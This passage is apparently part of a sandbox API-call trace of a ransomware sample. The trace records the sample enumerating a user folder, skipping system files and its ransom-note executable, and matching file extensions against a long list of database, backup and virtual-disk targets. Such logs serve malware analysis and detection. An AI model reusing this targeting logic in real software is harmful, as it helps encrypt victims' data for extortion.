lpString2=".") returned 1 [0039.637] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0039.637] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0039.637] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0039.637] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0039.637] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0039.637] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0039.637] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0039.638] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0039.638] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0039.638] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0039.638] lstrlenW (lpString="desktop.ini") returned 11 [0039.638] lstrlenW (lpString="C:\\Users\\Public\\Desktop") returned 23 [0039.638] lstrcpyW (in: lpString1=0x2e2e880, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0039.638] lstrlenW (lpString="desktop.ini") returned 11 [0039.638] lstrlenW (lpString="Ares865") returned 7 [0039.638] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0039.638] lstrlenW (lpString=".dll") returned 4 [0039.638] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0039.638] lstrlenW (lpString=".lnk") returned 4 [0039.638] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0039.638] lstrlenW (lpString=".ini") returned 4 [0039.638] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0039.638] lstrlenW (lpString=".sys") returned 4 [0039.638] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0039.638] lstrlenW (lpString="desktop.ini") returned 11 [0039.638] lstrlenW (lpString="bak") returned 3 [0039.638] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0039.638] lstrlenW (lpString="ba_") returned 3 [0039.638] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0039.638] lstrlenW (lpString="dbb") returned 3 [0039.638] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0039.638] lstrlenW (lpString="vmdk") returned 4 [0039.638] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0039.638] lstrlenW (lpString="rar") returned 3 [0039.638] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0039.638] lstrlenW (lpString="zip") returned 3 [0039.638] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0039.638] lstrlenW (lpString="tgz") returned 3 [0039.638] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0039.638] lstrlenW (lpString="vbox") returned 4 [0039.638] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0039.639] lstrlenW (lpString="vdi") returned 3 [0039.639] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0039.639] lstrlenW (lpString="vhd") returned 3 [0039.639] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0039.639] lstrlenW (lpString="vhdx") returned 4 [0039.639] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0039.639] lstrlenW (lpString="avhd") returned 4 [0039.639] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0039.639] lstrlenW (lpString="db") returned 2 [0039.639] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0039.639] lstrlenW (lpString="db2") returned 3 [0039.639] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0039.639] lstrlenW (lpString="db3") returned 3 [0039.639] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0039.639] lstrlenW (lpString="dbf") returned 3 [0039.639] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0039.639] lstrlenW (lpString="mdf") returned 3 [0039.639] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0039.639] lstrlenW (lpString="mdb") returned 3 [0039.639] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0039.639] lstrlenW (lpString="sql") returned 3 [0039.639] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0039.639] lstrlenW (lpString="sqlite") returned 6 [0039.639] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0039.639] lstrlenW (lpString="sqlite3") returned 7 [0039.639] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0039.639] lstrlenW (lpString="sqlitedb") returned 8 [0039.639] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0039.639] lstrlenW (lpString="xml") returned 3 [0039.639] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0039.639] lstrlenW (lpString="$er") returned 3 [0039.639] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0039.639] lstrlenW (lpString="4dd") returned 3 [0039.639] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0039.640] lstrlenW (lpString="4dl") returned 3 [0039.640] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0039.640] lstrlenW (lpString="^^^") returned 3 [0039.640] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0039.640] lstrlenW (lpString="abs") returned 3 [0039.640] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0039.640] lstrlenW (lpString="abx") returned 3 [0039.640] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0039.640] lstrlenW (lpString="accdb") returned 5 [0039.640] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0039.640] lstrlenW (lpString="accdc") returned 5 [0039.640] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0039.640] lstrlenW (lpString="accde") returned 5 [0039.640] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0039.640] lstrlenW (lpString="accdr") returned 5 [0039.640] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0039.640] lstrlenW (lpString="accdt") returned 5 [0039.640] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0039.640] lstrlenW (lpString="accdw") returned 5 [0039.640] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0039.640] lstrlenW (lpString="accft") returned 5 [0039.640] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0039.640] lstrlenW (lpString="adb") returned 3 [0039.640] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0039.640] lstrlenW (lpString="adb") returned 3 [0039.640] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0039.640] lstrlenW (lpString="ade") returned 3 [0039.640] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0039.640] lstrlenW (lpString="adf") returned 3 [0039.640] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0039.640] lstrlenW (lpString="adn") returned 3 [0039.640] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0039.640] lstrlenW (lpString="adp") returned 3 [0039.640] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0039.640] lstrlenW (lpString="alf") returned 3 [0039.640] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0039.641] lstrlenW (lpString="ask") returned 3 [0039.641] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0039.641] lstrlenW (lpString="btr") returned 3 [0039.641] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0039.641] lstrlenW (lpString="cat") returned 3 [0039.641] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0039.641] lstrlenW (lpString="cdb") returned 3 [0039.641] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0039.641] lstrlenW (lpString="ckp") returned 3 [0039.641] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0039.641] lstrlenW (lpString="cma") returned 3 [0039.641] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0039.641] lstrlenW (lpString="cpd") returned 3 [0039.641] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0039.641] lstrlenW (lpString="dacpac") returned 6 [0039.641] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0039.641] lstrlenW (lpString="dad") returned 3 [0039.641] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0039.641] lstrlenW (lpString="dadiagrams") returned 10 [0039.641] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0039.641] lstrlenW (lpString="daschema") returned 8 [0039.641] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0039.641] lstrlenW (lpString="db-journal") returned 10 [0039.641] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0039.641] lstrlenW (lpString="db-shm") returned 6 [0039.641] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0039.641] lstrlenW (lpString="db-wal") returned 6 [0039.641] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0039.641] lstrlenW (lpString="dbc") returned 3 [0039.641] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0039.641] lstrlenW (lpString="dbs") returned 3 [0039.641] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0039.641] lstrlenW (lpString="dbt") returned 3 [0039.641] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0039.641] lstrlenW (lpString="dbv") returned 3 [0039.642] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0039.642] lstrlenW (lpString="dbx") returned 3 [0039.642] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0039.642] lstrlenW (lpString="dcb") returned 3 [0039.642] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0039.642] lstrlenW (lpString="dct") returned 3 [0039.642] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0039.642] lstrlenW (lpString="dcx") returned 3 [0039.642] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0039.642] lstrlenW (lpString="ddl") returned 3 [0039.642] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0039.642] lstrlenW (lpString="dlis") returned 4 [0039.642] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0039.642] lstrlenW (lpString="dp1") returned 3 [0039.642] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0039.642] lstrlenW (lpString="dqy") returned 3 [0039.642] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0039.642] lstrlenW (lpString="dsk") returned 3 [0039.642] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0039.642] lstrlenW (lpString="dsn") returned 3 [0039.642] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0039.642] lstrlenW (lpString="dtsx") returned 4 [0039.642] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0039.642] lstrlenW (lpString="dxl") returned 3 [0039.642] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0039.642] lstrlenW (lpString="eco") returned 3 [0039.642] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0039.642] lstrlenW (lpString="ecx") returned 3 [0039.642] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0039.642] lstrlenW (lpString="edb") returned 3 [0039.642] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0039.642] lstrlenW (lpString="epim") returned 4 [0039.642] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0039.642] lstrlenW (lpString="fcd") returned 3 [0039.642] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0039.643] lstrlenW (lpString="fdb") returned 3 [0039.643] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0039.643] lstrlenW (lpString="fic") returned 3 [0039.643] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0039.643] lstrlenW (lpString="flexolibrary") returned 12 [0039.643] lstrlenW (lpString="fm5") returned 3 [0039.643] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0039.643] lstrlenW (lpString="fmp") returned 3 [0039.643] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0039.643] lstrlenW (lpString="fmp12") returned 5 [0039.643] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0039.643] lstrlenW (lpString="fmpsl") returned 5 [0039.643] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0039.643] lstrlenW (lpString="fol") returned 3 [0039.643] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0039.643] lstrlenW (lpString="fp3") returned 3 [0039.643] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0039.643] lstrlenW (lpString="fp4") returned 3 [0039.643] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0039.643] lstrlenW (lpString="fp5") returned 3 [0039.643] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0039.643] lstrlenW (lpString="fp7") returned 3 [0039.643] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0039.643] lstrlenW (lpString="fpt") returned 3 [0039.643] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0039.643] lstrlenW (lpString="frm") returned 3 [0039.643] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0039.643] lstrlenW (lpString="gdb") returned 3 [0039.643] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0039.643] lstrlenW (lpString="gdb") returned 3 [0039.643] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0039.643] lstrlenW (lpString="grdb") returned 4 [0039.643] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0039.643] lstrlenW (lpString="gwi") returned 3 [0039.643] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0039.644] lstrlenW (lpString="hdb") returned 3 [0039.644] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0039.644] lstrlenW (lpString="his") returned 3 [0039.644] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0039.644] lstrlenW (lpString="ib") returned 2 [0039.644] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0039.644] lstrlenW (lpString="idb") returned 3 [0039.644] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0039.644] lstrlenW (lpString="ihx") returned 3 [0039.644] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0039.644] lstrlenW (lpString="itdb") returned 4 [0039.644] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0039.644] lstrlenW (lpString="itw") returned 3 [0039.644] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0039.644] lstrlenW (lpString="jet") returned 3 [0039.644] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0039.644] lstrlenW (lpString="jtx") returned 3 [0039.644] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0039.644] lstrlenW (lpString="kdb") returned 3 [0039.644] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0039.644] lstrlenW (lpString="kexi") returned 4 [0039.644] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0039.644] lstrlenW (lpString="kexic") returned 5 [0039.644] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0039.644] lstrlenW (lpString="kexis") returned 5 [0039.644] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0039.644] lstrlenW (lpString="lgc") returned 3 [0039.644] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0039.644] lstrlenW (lpString="lwx") returned 3 [0039.644] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0039.644] lstrlenW (lpString="maf") returned 3 [0039.644] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0039.644] lstrlenW (lpString="maq") returned 3 [0039.644] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0039.644] lstrlenW (lpString="mar") returned 3 [0039.644] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0039.645] lstrlenW (lpString="marshal") returned 7 [0039.645] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0039.645] lstrlenW (lpString="mas") returned 3 [0039.645] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0039.645] lstrlenW (lpString="mav") returned 3 [0039.645] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0039.645] lstrlenW (lpString="maw") returned 3 [0039.645] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0039.645] lstrlenW (lpString="mdbhtml") returned 7 [0039.645] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0039.645] lstrlenW (lpString="mdn") returned 3 [0039.645] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0039.645] lstrlenW (lpString="mdt") returned 3 [0039.645] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0039.645] lstrlenW (lpString="mfd") returned 3 [0039.645] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0039.645] lstrlenW (lpString="mpd") returned 3 [0039.645] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0039.645] lstrlenW (lpString="mrg") returned 3 [0039.645] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0039.645] lstrlenW (lpString="mud") returned 3 [0039.645] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0039.645] lstrlenW (lpString="mwb") returned 3 [0039.645] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0039.645] lstrlenW (lpString="myd") returned 3 [0039.645] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0039.645] lstrlenW (lpString="ndf") returned 3 [0039.645] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0039.645] lstrlenW (lpString="nnt") returned 3 [0039.645] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0039.645] lstrlenW (lpString="nrmlib") returned 6 [0039.645] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0039.645] lstrlenW (lpString="ns2") returned 3 [0039.645] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0039.645] lstrlenW (lpString="ns3") returned 3 [0039.646] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0039.646] lstrlenW (lpString="ns4") returned 3 [0039.646] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0039.646] lstrlenW (lpString="nsf") returned 3 [0039.646] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0039.646] lstrlenW (lpString="nv") returned 2 [0039.646] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0039.646] lstrlenW (lpString="nv2") returned 3 [0039.646] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0039.646] lstrlenW (lpString="nwdb") returned 4 [0039.646] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0039.646] lstrlenW (lpString="nyf") returned 3 [0039.646] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0039.646] lstrlenW (lpString="odb") returned 3 [0039.646] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0039.646] lstrlenW (lpString="odb") returned 3 [0039.646] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0039.646] lstrlenW (lpString="oqy") returned 3 [0039.646] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0039.646] lstrlenW (lpString="ora") returned 3 [0039.646] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0039.646] lstrlenW (lpString="orx") returned 3 [0039.646] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0039.646] lstrlenW (lpString="owc") returned 3 [0039.646] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0039.646] lstrlenW (lpString="p96") returned 3 [0039.646] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0039.646] lstrlenW (lpString="p97") returned 3 [0039.646] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0039.646] lstrlenW (lpString="pan") returned 3 [0039.646] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0039.646] lstrlenW (lpString="pdb") returned 3 [0039.646] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0039.646] lstrlenW (lpString="pdm") returned 3 [0039.646] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0039.647] lstrlenW (lpString="pnz") returned 3 [0039.647] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0039.647] lstrlenW (lpString="qry") returned 3 [0039.647] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0039.647] lstrlenW (lpString="qvd") returned 3 [0039.647] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0039.647] lstrlenW (lpString="rbf") returned 3 [0039.647] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0039.647] lstrlenW (lpString="rctd") returned 4 [0039.647] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0039.647] lstrlenW (lpString="rod") returned 3 [0039.647] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0039.647] lstrlenW (lpString="rodx") returned 4 [0039.647] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0039.647] lstrlenW (lpString="rpd") returned 3 [0039.647] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0039.647] lstrlenW (lpString="rsd") returned 3 [0039.647] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0039.647] lstrlenW (lpString="sas7bdat") returned 8 [0039.647] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0039.647] lstrlenW (lpString="sbf") returned 3 [0039.647] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0039.647] lstrlenW (lpString="scx") returned 3 [0039.647] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0039.647] lstrlenW (lpString="sdb") returned 3 [0039.647] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0039.647] lstrlenW (lpString="sdc") returned 3 [0039.647] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0039.647] lstrlenW (lpString="sdf") returned 3 [0039.647] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0039.647] lstrlenW (lpString="sis") returned 3 [0039.647] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0039.647] lstrlenW (lpString="spq") returned 3 [0039.647] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0039.647] lstrlenW (lpString="te") returned 2 [0039.648] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0039.648] lstrlenW (lpString="teacher") returned 7 [0039.648] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0039.648] lstrlenW (lpString="tmd") returned 3 [0039.648] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0039.648] lstrlenW (lpString="tps") returned 3 [0039.648] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0039.648] lstrlenW (lpString="trc") returned 3 [0039.648] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0039.648] lstrlenW (lpString="trc") returned 3 [0039.648] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0039.648] lstrlenW (lpString="trm") returned 3 [0039.648] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0039.648] lstrlenW (lpString="udb") returned 3 [0039.648] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0039.648] lstrlenW (lpString="udl") returned 3 [0039.648] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0039.648] lstrlenW (lpString="usr") returned 3 [0039.648] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0039.648] lstrlenW (lpString="v12") returned 3 [0039.648] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0039.648] lstrlenW (lpString="vis") returned 3 [0039.648] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0039.648] lstrlenW (lpString="vpd") returned 3 [0039.648] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0039.648] lstrlenW (lpString="vvv") returned 3 [0039.648] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0039.648] lstrlenW (lpString="wdb") returned 3 [0039.648] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0039.648] lstrlenW (lpString="wmdb") returned 4 [0039.648] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0039.648] lstrlenW (lpString="wrk") returned 3 [0039.648] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0039.648] lstrlenW (lpString="xdb") returned 3 [0039.648] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0039.649] lstrlenW (lpString="xld") returned 3 [0039.649] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0039.649] lstrlenW (lpString="xmlff") returned 5 [0039.649] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0039.649] FindNextFileW (in: hFindFile=0x2ca380, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0039.649] lstrcmpiW (lpString1="Documents", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.649] lstrcmpiW (lpString1="Documents", lpString2="aoldtz.exe") returned 1 [0039.649] lstrcmpiW (lpString1="Documents", lpString2=".") returned 1 [0039.649] lstrcmpiW (lpString1="Documents", lpString2="..") returned 1 [0039.649] lstrcmpiW (lpString1="Documents", lpString2="windows") returned -1 [0039.649] lstrcmpiW (lpString1="Documents", lpString2="bootmgr") returned 1 [0039.649] lstrcmpiW (lpString1="Documents", lpString2="temp") returned -1 [0039.649] lstrcmpiW (lpString1="Documents", lpString2="pagefile.sys") returned -1 [0039.649] lstrcmpiW (lpString1="Documents", lpString2="boot") returned 1 [0039.649] lstrcmpiW (lpString1="Documents", lpString2="ids.txt") returned -1 [0039.649] lstrcmpiW (lpString1="Documents", lpString2="ntuser.dat") returned -1 [0039.649] lstrcmpiW (lpString1="Documents", lpString2="perflogs") returned -1 [0039.649] lstrcmpiW (lpString1="Documents", lpString2="MSBuild") returned -1 [0039.649] lstrlenW (lpString="Documents") returned 9 [0039.649] lstrlenW (lpString="C:\\Users\\Public\\desktop.ini") returned 27 [0039.649] lstrcpyW (in: lpString1=0x2e2e880, lpString2="Documents" | out: lpString1="Documents") returned="Documents" [0039.649] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Documents", dwFileAttributes=0x10) returned 1 [0039.649] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7cc8 [0039.649] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x34) returned 0x2ccfa8 [0039.649] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2e7cd0 | out: ListHead=0x2e77d0, ListEntry=0x2e7cd0) returned 0x2e7cb0 [0039.649] FindNextFileW (in: hFindFile=0x2ca380, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28351f0f, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0039.650] lstrcmpiW (lpString1="Downloads", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.650] lstrcmpiW (lpString1="Downloads", lpString2="aoldtz.exe") returned 1 [0039.650] lstrcmpiW (lpString1="Downloads", lpString2=".") returned 1 [0039.650] lstrcmpiW (lpString1="Downloads", lpString2="..") returned 1 [0039.650] lstrcmpiW (lpString1="Downloads", lpString2="windows") returned -1 [0039.650] lstrcmpiW (lpString1="Downloads", lpString2="bootmgr") returned 1 [0039.650] lstrcmpiW (lpString1="Downloads", lpString2="temp") returned -1 [0039.650] lstrcmpiW (lpString1="Downloads", lpString2="pagefile.sys") returned -1 [0039.650] lstrcmpiW (lpString1="Downloads", lpString2="boot") returned 1 [0039.650] lstrcmpiW (lpString1="Downloads", lpString2="ids.txt") returned -1 [0039.650] lstrcmpiW (lpString1="Downloads", lpString2="ntuser.dat") returned -1 [0039.650] lstrcmpiW (lpString1="Downloads", lpString2="perflogs") returned -1 [0039.650] lstrcmpiW (lpString1="Downloads", lpString2="MSBuild") returned -1 [0039.650] lstrlenW (lpString="Downloads") returned 9 [0039.650] lstrlenW (lpString="C:\\Users\\Public\\Documents") returned 25 [0039.650] lstrcpyW (in: lpString1=0x2e2e880, lpString2="Downloads" | out: lpString1="Downloads") returned="Downloads" [0039.650] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Downloads", dwFileAttributes=0x10) returned 1 [0039.650] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2240 [0039.650] RtlAllocateHeap (HeapHandle=0x2b0000, 